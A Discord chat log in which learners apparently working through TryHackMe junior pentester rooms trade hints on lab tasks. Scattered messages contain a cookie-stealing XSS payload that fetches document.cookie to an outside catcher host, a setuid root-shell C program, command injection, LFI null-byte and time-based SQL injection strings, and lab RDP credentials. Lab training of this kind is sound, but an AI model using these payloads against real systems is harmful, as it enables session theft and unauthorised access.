#junior-pentester-path
can you show ur screenshot in dm?
ok cool ill give it a go
I'm down to the last 2 rooms
Hello can i get some help with a question of the command injection room?
The "What is the term for the process of "cleaning" user input that is provided to an application?" question, i have read everything twice, tried with input sanitising and so on and doesn't seem to work
Any hint?
yeah for questions like that, I always look in the text right above the question, i can help with spelling differences
thank you ill try it out!
Thanks @deft valley for your help...
Gave +1 Rep to @deft valley
||I'm a little confused on how to use burp to get a shell, if it's a matter of using intruder on a page in the admin section and uploading to a page, A) what page would that be and B) how would I go about that. I've only done an intruder on like logins and things like that using sniper in other paths/rooms?||
you just have to have it running on the system
||oh, I've tried a couple of times now but I'm just getting html code and when I've tried to make it a stable shell it just rejects it but this is different from previous tries, so there's that||
either way it looks like it's getting closer so thanks so far @visual crest
so try something like 'id' and scroll up
not saying it's a great exploit but it's a workable one
true, I tried whoami, ls, and id but only ls gives a little info, other than that it gives me a warning in the messages
even tried cd but it's the same
yeah it's not really a shell, it's the ability to run commands
but you should be able to validate file with ls and read it with cat
ok, is there a possibility that I can see more in different directories
||just because I know that the flag is in /home/ubuntu but I can't see it using ls||
dang really over thinking it, thanks @modest arch and @visual crest
Gave +1 Rep to @tulip elm
For SSRF Task 2 just do this:
||don't over think it, it's simple||
usually overthinking it is what gets you in trouble
yeah way too true
task 5 ssrfqi room doesn't have any avatar, I've tried it in several ways, but it gives error 404 and You cannot access this page from your IP address.
hi... I'm stuck on privEsc task 5 (linux). When I want to write the exploit on the target machine it says (permission denied). I create an http server with python and try to download it using wget and it says (permission denied). How do I run the exploit if it doesn't let me write or download anything?
Thanks
How much trouble like in most cases just taking too much time?
you have to find a directory you can write to, there is a common directory on linux systems for this
are you using the developer tools? you need to select the radial button for the avatar and follow the guidance
radio
radial
I'm sorry. Maybe I don't understand
what?
Never mind.
Thanks a lot!! I used the find command for that.
Gave +1 Rep to @visual crest
Hey guys, so I'm having issues with the Linux PrivEsc Task 3 on enumeration. I'm not able to use the information in the examples to find the answers to the questions. Is there something I'm missing?
Both the Hostname and uname commands worked fine but everything else tells me that I don't have permissions.
The question I'm mainly stuck on is what linux version it is.
I'm using inspect, but there is no radio and no avatar, there is only username, email and password
I'll try that. Thanks
Gave +1 Rep to @steel nymph
Are you on the page where you can see the pictures of the avatars?
hover to radio button and right click to inspect it... hope it will work
I tried restarting the machine and using the command in the example: /proc/version and I get an error stating that Karen is not a member of the sudoers file. This doesn't seem to be a bug. Do I need to run a different command to get this information?
I can't get the cookie stealer blind xss ticket system flag
i've tried nc, python simplehttpserver and the provided website
does not exist
I had to use the tryhackme request catcher for this one.
cat /etc/os-release
@hollow acorn ok thx I'll keep trying with that
Gave +1 Rep to @hollow acorn
there is only the fields to update user, email and password
If it doesn't work let me know the command you are using to attempt to catch it in the website.
This is task 5 correct?
yes task 5 ssrf practical
One moment. Let me pull it up. I remember this one being pretty tricky
So, the first step is to create a new account to get to the section where you can select your avatar
You would just need to create a fake account to login first
I used this command and I believe the information is there but not in the way the answer is formatted. I'm not sure what it's exactly looking for.
Never mind. I found it. Not sure why they recommended other commands to find the information if I wouldn't have access to use them.
I've already created an account and it doesn't show up, then I created three accounts and it didn't show up in any of them either.
You need to create the account and then login to the account you created
"Don't have an account yet? Signup here." Then login with the created credentials
Were you able to get to the section where you can change your avatar?
I've created it, I've logged in, I can change all the data, create tickets, do everything, but the avatar part doesn't appear
Maybe a stupid question but how do you connect to the Windows privilege esc machine or do I need to find a vuln for this?
you can use attack box or xfreerdp
Yeh I wanted to use xfreerdp thanks for the credentials
when I put it, it redirects me to /customers/login, then I log in again and it doesn't appear, I'll restart the machine again, and clean the browser
like this - xfreerdp /u:jack /p:Password11 /v:10.10.196.25
I'm in
I'm surprised the room doesn't give more information on the best way to connect to the room. I guess it just assumes you will use the attack box?
I would say the same about the linux one as well
Very difficult for me to follow so far
I'm relatively familiar with linux privesc but I'm trying to follow along and do it the way the room recommends. Seems fairly difficult to follow but that may just be me. The enumeration section was pretty confusing to me.
I'm surprised there aren't any hints. There were a couple of answers that were not able to be found using the commands demonstrated. I had to use external commands that were not included, which I'm not used to with tryhackme rooms
I was able to find the version just fine, but the question "What Linus is this?" and finding the version of python were not as straight forward for me
*Linux
use "cat /etc/os-release"
I just don't understand why they would use commands as an example to find specific information if we were not able to use the commands and needed to use other commands that were not covered in the room.
It seems they teach you A way to do it. They want you to take what you've learned and apply it. A quick google search for both of those questions would have provided an answer.
/etc/issue works fine but they give /proc/version as an example but it cannot be used to answer the questions
I'm just used to the answers to the questions being covered in the room as opposed to doing research to find the commands to use. If that is required in other rooms they usually provide a hint that states it requires a command that was not covered. Maybe I got too comfortable with the straightforwardness of other rooms
now not redirected and appeared in avatars
Great to hear! The rest should be much more straight forward now
I think they want you to get used to using your GoogleFu.
Anyone have the same problem (connection error) on privEsc linux?
thank you very much, I've already finished the room, it was just the avatar that needed to appear
I was already able to connect only by ssh. Thanks
Gave +1 Rep to @steel nymph
guys stuck at Vulnerability Capstone What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine
rootflag or missy?
I'm already done with it
The windows privesc is really unclear
"Login with Jack's account (the new password you have set)". I have never changed any password or had any instructions on how to
Yes
procmon needs UAC to run
Alright ill try to reproduce those steps then thanks
I copied the CVE exploit and got a syntax error
look at the exploit to determine if there are any prerequisites for running the exploit, it has a pretty unusual one
there may be other exploits out there to use too
or good evening
When will you save us all man
It's 1:32 AM here
sorry to say... my husband tried to put on The Matrix to play in the background and I told him.. no
Hahahha
7:33 pm here
installed all dependencies nothing
did you read the exploit?
on the other hand, I'd have Lord of the Rings playing in the background
And playground im almost through
THANK YOU
Gave +1 Rep to @visual crest
I may play things in the background that I've seen before
Hahahah
in general, I don't like re-watching movies unless I love them
like there are very few movies I'd re-watch
but I'd play movies in the background that are ok/good
of course
so it requires something to be running on your system... it is mentioned in the exploit code
I can't exploit the CVE and you want me to start a reverse shell
The dark knight rises
... no that isn't what I'm talking about... there is an unexpected thing you need to have running
Yes, that one was tough, also the code it needs some editing
If im not mistaken
Also, serious question, i suck at programming, what can i do to get better
practice
Practice how
CS50 is recommended by a lot of people (available on EdX)
That's a course?
Same man
Same
I've had so many bad teachers I lost all motivation
And passion
Nice will check it out thank you :)
lots of people really really like it
Ah shit, i need to pay?
also there are a few programming challenge websites out there where they give you a challenge and the challenges get more difficult
edx is free
Like hackerone?
The exorcism
Indeed
Haha
Will try it out as well
I'm being bombarded by a lot of new information from this new junior pentesting module
It's driving me insane, there are a lot of things I don't know
Neo did you finish the LFI?
I just feel time is flying, and i need to get shit done quickly
I need to slow down
Can i dm you?
usr/share/wordlists/SecLists/Usernames/Names/names.txt: no such file or directory
I do have seclists on my kali
machine
Download from here
how to install on my kali machine, i already have seclists
what directory do you have names.txt?
or should say what directory do you have seclists, is it the same from the command given? if not, you need to modify the command
actually there's no seclists inside wordlists
Hello chat, may i get some help with the Task 13 from the burp suite basics? The site map isn't showing anything interesting, and i think i may be doing something wrong
hey I had a problem there, I put the S and L in "SecLists" in small letters
that's how I have it installed
check /usr/share/seclists
Gave +1 Rep to @lavish thorn
file inclusion task 8 challenge 3, how do I get rid of the .php? nullbyte won't work, a space shows up before the period. I have set the form to post and have the special characters but can't get rid of the .php
nullbyte won't work?
bash script for exploit ./exploitFuelCMS.sh: line 42: urlencode: command not found
where did you get a bash script? the exploit you find with the room is python
on github, a bash script for this cve
fuel cms 1.4
oh I used the one from exploit-db
same with me
it becomes like this flag3%00.php
after submission
include(../../../../etc/flag3%00 .php) is what i get the space after the nullbyte and before the period is my problem
same
I don't know what to do
been stuck for 2 days
I wish I could remember, they all bleed together
Hey y'all back again -- doing the last XSS exercise where I have to feed it a rogue ticket
I've been giving it this: </textarea><script>fetch('http://OUR_IP:PORT?cookie=' + btoa(document.cookie) );</script>
i just got to this question but have been trying the room for like a week on and off
where our ip is my tun0 and port is 9001 like the nc listener in the exercise suggests but nothing is reaching my listener
I tried also opening up a simple python server but that didn't work either :[ please advise pls + ty
I used the catcher they recommend, netcat didn't work for me on this
I kind of want to say I used developer tools for this but I could be wrong
ty I'll give that a shot
Gave +1 Rep to @visual crest
the nullbyte isn't working for me, I get include(../../../../etc/flag3%00 .php)
on python I got this error File "exploit1.py", line 24
print r.text[0:dup]
^
are you using python2?
no
oops
Anyone got the password of user 2 in the privsec room task 7? I found the hash but I couldn't crack it
try john the ripper
although that answer made me so mad
I feel you, I had the same reaction
any help on file inclusion task 8 challenge 3
Not entirely certain I'm doing this correctly, do I use the 10.10.10.100 IP they gave and not specify a port? Or do I use the really long hex string URL thing that's generated?
its a website
right but for the URL in the payload
should I use that IP? (10.10.10.100)
or use the long url thing it generates when I navigate there?
no, go to that url in a web browser
Hey gang - I am trying to get Flag7 in linux privesc in junior pentester path. I followed the instructions, but the compiled C program is not granting me a root shell. The program I am compiling is:
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */
int main()
{ setuid (0);
setgid (0);
system("/bin/bash");
looks like it needs a closing }
return 0;
}
oh
yeah - it's the same code shown in the instructions. After that I am using "gcc nfs.c -o nfs -w" to create an executable called "nfs"
this is then given SUID with "chmod +s nfs"
hmm I haven't done that exercise yet :[ was just going off my little pool of C knowledge
I'm only on flag 5
running it on the machine does indeed open a new shell, but I stay with a shell as "karen"
I created exploit.py and copied the code from exploit-db and got this error File "exploit.py", line 24
print r.text[0:dup]
and you are using python 2?
python3 exploit.py and error
the code is faulty it needs readjustment
use python
so either you use python2 or you modify the script to meet python3 standards
no
and print(r.text[0:dup])
Is there anyone that can help me out a bit with the executable name in Windows privilege esc task 6
"What would be the name of the executable you would place in that folder?"
Didn't get any helpful results from accesschk64.exe
I haven't gotten to the windows room so far but hopefully someone else has
So I am there, I'm using the uniquely generated url in my payload, is there something else I should do?
that should be it
should I append "strc9f96db06ba7fb3d61977912873468b2.log.tryhackme.tech" this to 10.10.10.100 in my payload or use it as the domain name in lieu of an IP address?
Unfortunately neither have seemed to work
yes
its the domain name, it should work
then it will pop up on the website
Found out myself, read the description too fast
so the payload would be:
</textarea><script>fetch('http://c9f96db06ba7fb3d61977912873468b2.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script>
no?
that looks right
maybe no /
unfortunately nothing
at the end of the url
okay I'll try that
can you link the room?
that's the vulnerability capstone
okay. i know i did it within the last few weeks. just couldn't recall which
It was indeed the '/' :[[[
well yay you got it?
I did thank you so much ^.^
Gave +1 Rep to @visual crest
PIZZA PARTY
only a few more questions for my 2nd to last room... linux priv esc
Best of luck
Out of curiosity what prizes have been cleaned out? I saw someone got one of the pineapples but did two people already get the OSCP vouchers?
I'm a far cry from getting anything like that
I only got the 7 day and 1 day and pentest title
yeah managed to get the title and I keep getting freeze tickets :/
I've gotten soo many duplicates of pentest and 1day streak. I assume everybody is like that.
didn't help that 1) I also forgot to click "redeem ticket" and clicked the next room a few times. I expect those rolls lost. 2) started some of the burp/vuln classes before the event since I saw new rooms
oh wait I finished a room but I skipped the ticket redeem click, does it not auto redeem?
@jade lodge me too
I would expect so. I went to rooms I finished before the event or forgot to click and nothing would pop up
I suppose it's no big deal either way cuz I think by the time I clear out the rooms the few prizes I'd want will be gone, still going to do these for the practice though
Can anyone share some advice for Flag7 on Linux Privesc?
the instructions don't seem to work.
for the vuln-capstone course, how are you supposed to fix the error? I don't know much python, but I know zero python2
"Traceback (most recent call last):
File "exploit.py", line 1, in <module>
import requests
ImportError: No module named requests"
when i try
Pip2 install requests. it says python3 requests already satisfies.. but still breaks on running
use python2?
running python2 gives me an error. running pip install says requests is already installed. I know c++ not python :p
what error do you get with python2?
your pip isn't an alias to pip3 is it?
you could also try python2.7 -m pip install requests
okay. I think I'm making progress. when running pip or pip2, it ran pip3. when I ran /usr/bin/python2 -m pip install requests.... it worked
I see you have a space between the function name and the parens, is that in your code as well? I can't imagine gcc would let that compile?
Granted I'm out of my depth on this one but just taking a look at it now for smiles and giggles
you're right, in the code I am using I do not use spaces. It was able to compile just fine.
cat exp.c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setgid(), setuid() */
int main()
{ setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}
this is what I compiled
Has anyone figured out the Linux PrivEsc Cron Job task (task 9)? I keep getting a connection error in the window, and connecting through ssh I don't think the cron job is actually happening
Thanks. I'm not familiar with python.
Gave +1 Rep to @visual crest
check to make sure what is being run is executable
What Zojja said. I had to "chmod +x backup.sh" to get the crontab to run it.
thanks, that worked
I was caught up on the gui of it just not connecting, I thought there was another issue
maybe try compiling the file with the syntax: gcc nfs.c and then chmod on the ./a.out it creates? Apologies if this does not work, I'm definitely out of my depth but tryna help lol
I figured out file inclusion challenge 3 || the hint says not everything is filtered. if you use burp, capture the request, send to repeater, change the method from GET to POST and add parameters to the body. under the inspector select the add button after expanding the body parameters box. for the name put file then for value put ../../../../etc/flag3 then hit enter. do not add the nullbyte as it will encode to %2500 in the request. but not everything is filtered, so add in %00 at the end of the body parameter in the actual request before you send and view the response ||
Thanks so much. I'll give it a try.
Gave +1 Rep to @uncut spade
Please spoiler that post. It gives away the answer to other people
To make something a spoiler put it between | | | |. ||LIKE THIS||
Gave +1 Rep to @drifting drum
Np
Like that
thank you, sorry, first day using discord. will keep in mind next time.
Gave +1 Rep to @drifting drum
No problem. Just don't like spoiling something that people might wanna try on their own
|| like this || || like that|| || like this || lol
woot finished linux room, tomorrow will tackle windows
Nice!
Hey all, having some issues with Lab 2 in task 4. I've tried intentionally putting in an invalid input but can't seem to find the proper directory to answer the question. Any guidance would be greatly appreciated.
Hi everyone. I cannot figure out for the life of me how to view the website directory listing in "Walking An Application". Don't want any answers, but I would appreciate a shove in the right direction.
I'm completing Authentication bypass room but in the bruteforce task I'm not getting valid username and password
What is the password to login for winprivesc room? There is only rdp open... Guest login is not working
Ohhh it's in split view... Nice
Can anyone plz help me on this
I am in 'NetSecMod Room 02 telnet' room Task 4. The question with traceroute B is giving me trouble. I tracerouted 5-6 times and used the IP in answer but didn't get the right answer. Please help me.
Traceroute B, what is the IP address of the last router/hop
Ahh I remember getting stuck here... It's in the 26th hop if I am not wrong
You saved me.
Thanks buddy
does your username file include anything other than JUST names?
it should complete in under 10 seconds
usernames along with status code etc
remove everything but usernames. 1 name per line
okay
I solved it. Had to look at it from a different angle.
it didn't work I'm still getting same output
PM me and screen the command you used as well as the username file
Np
I'm on the sql room and the first level just keeps loading and nothing happens when I put in different inputs
Happy to get this 3rd ticket for the 7-day streak freeze prize for completing rooms on the new Jr Penetration Tester path
I had same problem restart the machine
how do we access windows machine for priv esc?
RDP
I mean for linux, credentials were provided. but I don't see any here, so does that mean we have to get those too first or am I missing something here?
stuck on file inclusion flag2
I m on Linux PrivEsc can anyone help me to do PrivEsc on Task7
DM
got the ans, splitview
where are you stuck?
This one in the bag on Day3 but alas all I have to show the wife is a new coffee mug -lol. I must be that unlucky or the competition is just that fierce. It made me learn harder, faster, so there's that!
Priv Esc. I didn't get any useful SUID files.
I have cracked passwords too. Checked SUID for switched users.
got no luck
there is one binary, which can be used. you can take a look at this previous discussion. #junior-pentester-path message
Stuck here as well. the files with +s set do not reflect the screen shots.
whatever is mentioned in the explanation and screenshots is just an example, you have to find out what will work yourself in this case.
try using linpeas if you're having a hard time
cannot get past file inclusion task 8 flag 2, been trying everything
I have been, for hours now.
it says welcome helloworld
It's like insurance. It kicks in if you miss a day on THM, so you can maintain your streak
afaik if you miss one day of learning your streak does not get reset. So you can take a day (or seven) off
I have 2/3 on most of the things, I hope I'll stop getting freezes tho :/
Good luck. I got the title, both streak freezes and 10% off the swag store. And all others 2/3 xD
probably all the vouchers have already been taken
hey if I connect to tryhackme with openvpn on both my vm and main system, does it work on only one at a time?
??
Or is it just my internet speed problem
??
this works fine for me. I do it all the time
Authentication bypass machine from tryhackme is not showing <logged_in> cookie.
it just shows <admin> and <session> cookie.
??
curl works but I don't see the logged_in cookie
how did we know about the logged_in cookie??
I was able to solve the lab
do you know?
how to know about logged_in cookie from target's website
yes
with robert
Ok am I completely blind... how do we login into the Windows system for Windows Priv Esc?
no doubt
how long does the windows priv esc task 6 to get rev connection
ok I see it now
Gave +1 Rep to @steel nymph
i see found my error thanks anyway
I'm getting only one ticket instead of two since like 6hrs ago, what's the problem?
I can't figure out the SSRF example flag (task 2). Can anyone help me please?
i've been trying this for like an hour and I can't seem to figure it out
are you still a subscriber?
is there another way to get a ticket after finishing the path ?
I only have 1 room left so...
pretty sure you are missing an &
well yeah that doesn't work but it should help you get on right track
do I have to do something with the ID
I can't seem to figure it out
I'm gonna try again later
this isn't going anywhere
yeh it will expire only after next month which means i subscribed for one month
yeah then #900054423588470854 is your best bet
Need a bump for linprivesc Task 3; CVE number. I inserted the kernel version and linux on exploitdb, and put the CVE number available but nothing is right. Am I missing something?
I didn't put "CVE" in it; thanks for the heads up tho
I see, just finished all of the rooms and didn't get the voucher I want hahaha
Hi! I'm stuck on the File Inclusion chall, task8, flag2. I've changed the cookie to be Admin, but then there is no input form.. am I missing something?
Ohh.. I didn't have the right value for the cookie.. So I've found the flag now! Thanks a lot lassi !
Anyone knows how to solve LFI infusion first challenge on Jr penetration tester path
Iโm literally stucked ๐ข
Room --> NetSecMod Room 06 nmap Reports
Task --> 5
Here it asked to run scp pentester@10.10.54.29:/home/pentester/*
but getting a straight error -->
# scp pentester@10.10.54.29:/home/pentester/* usage: scp [-346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file] [-l limit] [-o ssh_option] [-P port] [-S program] [[user@]host1:]file1 ... [[user@]host2:]file2
Can you specify the room name and task number?
Sure
File inclusion room
Task 8
Last task
okay
in linuxprivesc I can't find
What Linux is this?
Anyone plz lemme know
try to google how to know what kind of linux there are some methods you can use
hi guys, I am writing after 3 hours of trying, for the file inclusion room. Who can give some tricks for flag1 :/
need another hint on getting this flag in the file inclusion room, please)
I used curl, don't forget the http header for the post request
||check verb tampering and PayloadsAllTheThings, there's a method you could use for it||
yes i did exactly (with burp) but still not working
look at source in dev console, see if there's anything you can do there
any help with flag3 would be appreciated though, am well stuck on that one
everything I've tried gets filtered, no idea how to get the path traversal
Yeah bro
Same here bro
for flag1 I just sent the path from example 1 in the room and it worked fine
yep, thanks. I can get the path in now but the file extension is blowing it. tried %00 and /. at the end but no joy. I'll keep at it, so close now
Gave +1 Rep to @steel nymph
Hey Hi. Anyone for quick help in windows priv esc room?
if you change the request method you can also deal with extensions, you're on a good path
how to save the output in a file called valid_usernames.txt???
two rooms left to complete and this is what I have so far...
Hey Everyone, I am working on the Linux Priv Esc room with Cronjobs (Task 9), but I am not getting the cronjob to run, I have tested from the vm and can confirm it can manually connect to the attack machine, but the elevated cronjob doesn't seem to run. I have restarted the vm and it has made no difference. I have waited 10+ minutes for it but so far nothing. Any ideas?
did u find something
dm me if you need help
Name1
Name1
Name3
etc
and you can use nano to manually do it
try playing with the request method in dev console, changing the get request to something else and trying for the file again
thanks, I've solved it already
just helping)
Gave +1 Rep to @spare lava
ok)
Gave +1 Rep to @steel nymph
you need to specify .
at the end
Browsing to http://10.10.55.142:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?
had anyone solved task 2
Okay
Alright, I see the error messages. But when I look at the page source, the include statement doesn't seem to lead to anything 8 characters long. So I could use some "nudging" in the right direction, please. I am referring to Task 4 question #2. CANCEL- by moving to the next task, I was shown where to find my answer. I am concerned that it revealed that I was supposed to be looking at the code, but I have no idea how I was supposed to be looking at the code.
I'm stuck on chall 3 in the lfi room. How do you guys get rid of the extension file?
%00 and /. do not seem to work on this chall.. ^^
same, I'm out of ideas. I've gotten to this and still nothing.
can someone help with the Net Sec Challenge on port 8080?
I tried but I just received scan results
I tried xmas, syn, fin, tcp connect, all scans
also does not work for me
strange.... blind xss session cookie is telling me it is wrong. going to punt the box and see if I get the same result. getting the same cookie sent to both my box and 10.10.10.100
man it's simple, I got it
we have to trick the IDS so that it doesn't catch us
just after each scan reset the packets and then just try all the types of scans u have learned
okay will try, but for me, after a reset the % keeps going up without doing anything
in steps of 5%
only need to scan port 8080?
ah without a spoof?
yes like : sudo nmap -sX TARGET_IP
okay thank you
use different scan types as -sX will not profit u
will try after my hydra finishes... is taking a loong time
no no
its above 10000
anywhere in the task, did u scan all the ports?
aah, do a -p- -sV
yes this is what i am saying
yes
then you will find the port
hint: just below 11000
I have scanned all the ports and it's just about to complete
I have been waiting for the past 20 min.
i had to scan all the ports too with -p-
99.99 % done
took a very long time lol
then you'll find the port number is not far from 10000 lol
ah wait I did it without the -p-
how come
just ip scan
but I didn't get any results after 10000
if I just do a simple scan
used -Pn -n also
LinPrivEscSUID machine didn't start, why?
I am stuck in a position, where I need to download a file using SCP and get the size.
My scp command is working but not showing the download size. Can anyone help me with how to get the download size?
ONCE YOU DOWNLOAD THE FILE IN THE EXTREME RIGHT SIDE YOU WILL BE ABLE TO SEE IT
ohh, got it. It was in a small window, that's why I missed it.
Thanks
Gave +1 Rep to @loud spire
Man try to do a null scan
it's done, i got the answer
Very good, I've been stuck with it for a while too
I just wasn't paying attention to the reset functionality
we needed to trick IDS
using null scan
yes it is a nice room
No bruh, I came out for work
yeah we found it together but don't try with burp
maybe username location?
What task are you on @sullen perch
task 3 brute force
no
yes
Okay
validusernames.txt looks like this
Valid usernames is meant to have the 3 names from the previous task
oh okay
oh okay
Np
Also for the next task I'll give one bit of advice
Type the commands out
^
I was stuck for ages on it for a stupid mistake
Read it through a few times if need be
Someone got 3 ejpt or oscp vouchers?
0
Got practically 1-2 or 3 of every other voucher
Apart from pineapple, and those two
:(
My path progress is 96% and I didn't get any of them
I get the pentester title and 7 days streak all the time lol
Makes sense why I got so many
Same, pentester and win streak
me too
same...
wish they didn't use dupe tickets tbh
the last 3 though....
i want to win the wifi pineapple tbh
I know.... Its just teasing me
I just want a 1 month premium voucher then I'll be happy
Premium is nice to have honestly
@modest arch question, once redeemed pentester, can you toggle it on and off, or is it just like that forever
ez
nothing changed the last 4 5 rooms, only 2 rooms left lol
gl
This is mine
probably been snatched up yea
Gonna take Pentest+ in a few months maybe
Glad you're enjoying the ticket event. As for the prizes, you still have time.
Gave +1 Rep to @merry night
time to work towards my last 2 tickets
lfi task 8 flag 4 is about to make me cry lol
meant sqli... maybe I should take a break lol
if I complete a few rooms and get one ticket for them, then subscribe. is there a way to get those 2 extra tickets from the room's that I've completed?
nvm fixed it
don't think so
Yeah I'll take the dog for a walk and try again. I can get the 5s response, just can't work out the complete table names
aww man, thank you
Gave +1 Rep to @visual crest
thanks for the heads up, I almost considered doing that
I got the oscp voucher first day, just waiting on the email coming
Should get one ticket at least first time round resetting? No?
I've no doubt I'll make an arse of it but I can only try. Then try harder
Same here, I'm completely lost
My Burp looks almost exactly like yours (except for an extra line of Referer on mine). I get no response from Burp at all. It just sits there after I hit send. Any advice?
I have no idea sorry
can someone give me a nudge on the Metasploit: Meterpreter room?
ask what you need
bro just ask your question directly, you will get the answer faster ..
I simply don't understand the req'
in which point ?
for sure
i think you mean smb creds
you should use exploit/windows/smb/psexec module
from metasploit
You could study for longer then redeem the oscp voucher when you're ready for the exam
phffff file inclusion flag2
someone can give me tricks after set cookie=admin
I don't remember if it was this one exactly but sometimes you have to see if POST vs GET provides different results
yes this one i passed now it says about cookie, do u remember?
can someone help me at task 8 sql? I can't get the table name
I'd have to go back and redo it... the danger of not taking notes
don't they give you the table name?
nope, this is what they provide "referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';--"
tried already
it's the time response sql
you have to basically wiggle waggle it
test a few things
like 'u%' but change u to other things
yup
its tedious but
yeah I found myself skimming a few that didn't require an answer or required cursory answers then I had to go back
in order to solve later tasks
did u find something
in "Windows Privesc" we need to find a way for foothold?? or creds given to login?
it is user:Password1, task 5 shows it
thnx
am I the only "lucky" one who got only pentester title and 1 freeze streak for like 10 times?
Hey guys, i am having an issue with room 'activerecon' Task 6. i can use the telnet command fine with the Shift+Enter. However with the nc command it executes the command before i am able to insert the host name. Not sure if i am doing something wrong.
Can someone let me know if it's normal that the hydra brute force lasts longer than 30 mins for the Net Sec Challenge for question "We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?"
Can I get any help with Command Injection task 5
@solar ore are you using vpn or attackbox?
@swift mirage have you by chance done Command Injection?
why in command injection practical code doesn't execute, but ||ip && code|| is ok?
practical is causing me a pain as well, can't figure this out at all
been trying redirecting commands and all as well
does whoami work for you?
thats the command injection practical right?
yes theres whoami and find flag.txt
That works, but I'm wondering why it works like that
does the whoami work?
I got whoami working by ||;whoami||
Guys any idea how to solve file inclusion flag1 challenge
I tried every possible parameters
Maybe i didn't write the question correctly
I solved it
And now have question why whoami doesn't return output, but ip + whoami does?
Make sure you send post request to page with challenge1
tamagaft have you managed to get flag.txt
Yeah I sent POST request only
nvm got it
offensive security
When i run ping whoami i get some sort of error in my terminal.
But not on that site
got it
Dm me with your request
I'll try to help
lassi
Sure bro
I'm a bit confused how I managed to get the answer with one command and not the other
Nice
somehow ||127.0.0.1 | cat /home/tryhackme/flag.txt|| got it but not ||;cat /home/tryhackme/flag.txt||
even though the latter got whoami
I'm on the Metasploit: Meterpreter, any idea why does the sessions can't find the file secrets.txt and session crashes?
in linux privesc how can i got flag1
I need help on the room Authentication Bypass - Task 5 Cookie Tampering - I'm trying to run on the command line curl -H machine_IP Set-Cookie:session=eyJpZCI6MSwiYWRtaW4iOnRydWV9; Max-Age=3600; Path=/ => I have the following error: curl (3) ended with 's' - and - Max-Age=3600: command not found
I've got so many pentester titles, I'm like the godfather of pentesting
@scenic raft relook at what it is asking. That is the incorrect commands to run
@oblique sand can you please help me? I cannot think anything else
same, after crossing half of the machines I've got 2/3 of everything and keep getting that :/
lemme get even 3euro voucher
only one room left
i have 2 tickets of everything except title and streak freeze, got 1 year of streak freeze
@oblique sand thank you, but I'm confused. After the machine ip, what should I put?
Gave +1 Rep to @oblique sand
only privesc left
@scenic raft The machine ip is to be replaced with your machine IP.
The box you have started
I guess we needed to finish all the machines on the first day to get some
That I know, but I don't understand where I should put the rest of the command
u got this dude
@scenic raft DM me i can help you better
@reef wave you can always reset the previous rooms to get tickets again. I believe that is what it said you could do on the email
that's for the rooms u got before the event
ahhhh fair enough
that would mean even more titles and years of freeze haahaha
oh man! I got the same feeling...
Got the flag for stage6 on SQLi but it isn't accepting it
hey, click on the go to next level button
Guys, any hint on the vulnerability capstone?
I won't get other tickets because if I do it can be abusable lol
yep
Local File Inclusion challenges just melt my brain also... I tried at least 100 combinations with the %00, with all payloads.. i used the attackbox, I tried also from my pc.. with burp suite, without it, what the hell? I can't even get the first flag... this just makes me break stuff around me...
try curl
it's what happened to everybody
dev tools help more, and think easy, don't forget some space
it took my whole day
i ended up skipping file inclusion on the 4th question. i know it's something simple i'm overlooking but i got tired of spending the day looking for it
i was lucky to use curl and get flag fast)
@modest arch all depends if there's a time frame on it
?
i was not as u know
Slowly getting there on the sqli task 8 flag 4. I thought I enjoyed sqli until this flag haha
same mate haha
I've managed to get the sqli and number and enumerate what I think is the table name but its slooow going
can anyone tell me if my table name is at least correct
I can't get the column name I tried all letters A-z capital and small characters -,_ numbers (0-9)
u mean the table name is not complete
what you sayin', I got positive results
5seconds showed up
is it REALLY completely wrong
wtf
u sure?
SQLi is a pain to do
r u sure 'not your dad' ?
but why did I get positive from it then
I don't get it
If it is completely wrong
great
I want one hint does the table name start with 'a'?
Yes and no
ehh
gotcha
Loool
Just because the table you have is an existing table doesn't mean it contains the information you'll need
sad realities
is it just 5 letters or there's more?
@modest arch Check information in Task 7 and you will find what you are looking for, the names are very similar in both task 7 and task 8 & i'd also say check the SQL query box provided at the bottom of the screen. You may find in there that there is some information that you can use to escape your rabbit hole, in particular the ||select * from analytics_referrers|| should make you realise that the table you are searching in is not the right one.
Also bonus if you want it - When trying the password combo, don't waste time trying ||a-z as the passwords start with a numerical value||
So on linux PrivEsc Task 10 (PATH) || I'm using the ./test script to run "thm", but thm isn't running with elevated perms even though test has the SUID bit. i've tried both cat and /bin/bash inside thm, but neither are working with elevated perms. any ideas as to what im doing wrong? ||
nevermind, I figured it out
I'm a little stuck on the File inclusion Task 4 can't seem to get the pathing right when trying to find the /etc/passwd directory.
Tried different paths but no good.
/index.php?lang=../../etc/passwd
This is my start. Is this a good start? ^
nope
awesome
I have been following along and I can ping it, but I still get no response once I open the ticket. I have tried inserting my vpn ip, an attackbox ip, and the tryhackme catcher. None catch anything.
how can i exploit cve 2015 in linux privesc if i have permission denied
which task?
man the column name is easy to guess
cve 2015-1328
yaaas jus got it too
just as a heads up make sure to use spoiler tags (|| text ||) to not spoil anything for people who don't wanna see. anyway || they provide https://www.linuxkernelcves.com as a website with the task, so if you find the cve in there, there's a link to exploit db and some exploits that have been written for it. if you check there, you can find one that works. there are 2 i think (3 are listed but i think 2 are the same so). if you need more than this i can still help, just dont wanna give off too much ||
did you even read what i wrote? I got the cve, i got the exploit, but can't exploit it because of permission denied
Need to stop over thinking things lol. Well that and going down rabbit holes lol
you said "how can i exploit" so i started from the beginning, sorry. for that || find a directory you have write permission to. usually /tmp has write permissions for everyone, then run the exploit||
Generate an MD4 hashsum of the phrase: Insecure Algorithms
when i base64 this, THM doesn't like the answer ?
I'm guessing this is in the Burp Suite decoder?
has anybody else had issues with the vm in the last task of Metasploit Exploit?
the msfvenom one?
it specifically asks for output in base64
for some reason my burp is missing the md4 option in decoder so i used cyberchef but im guessing that won't affect it
i think the issue is if you're copy/pasting it might add some strange characters in the background? when i did it it was just fine, but i can double check if you would like
ill double check on my box real quick
wicked cheers man
nmap live host discovery task 7
What option do you need to add to Nmap to run a TCP SYN ping scan on the telnet port?
this question sucks
why?
what's the answer format?
read the section under "TCP SYN Ping" the second paragraph has the answer laid out right there
